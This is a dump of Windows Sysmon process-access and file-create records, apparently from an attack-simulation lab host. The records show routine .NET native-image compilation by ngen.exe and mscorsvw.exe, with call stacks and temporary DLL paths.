13:48:57.762{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1A03-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.746{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1A03-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.746{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1A03-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:57.700{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\131c-0\Accessibility.dll2021-01-18 13:48:57.700 10341000x80000000000000007379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.653{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.637{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.637{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.606{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1803-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.606{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1803-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.606{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1803-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:57.528{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f54-0\System.Management.dll2021-01-18 13:48:57.528 10341000x80000000000000007372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.997{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:58.996{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CA-6005-1C03-00000000A301}4560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:58.981{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CA-6005-1C03-00000000A301}4560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:58.981{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CA-6005-1C03-00000000A301}4560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:58.871{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\62c-0\Microsoft.VisualBasic.dll2021-01-18 13:48:58.871 10341000x80000000000000007403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.762{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.762{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.715{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-1F03-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.700{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-1F03-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.700{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-1F03-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:59.621{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1008-0\System.DirectoryServices.dll2021-01-18 13:48:59.621 10341000x80000000000000007396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.121{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.106{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.106{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-1E03-00000000A301}4104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 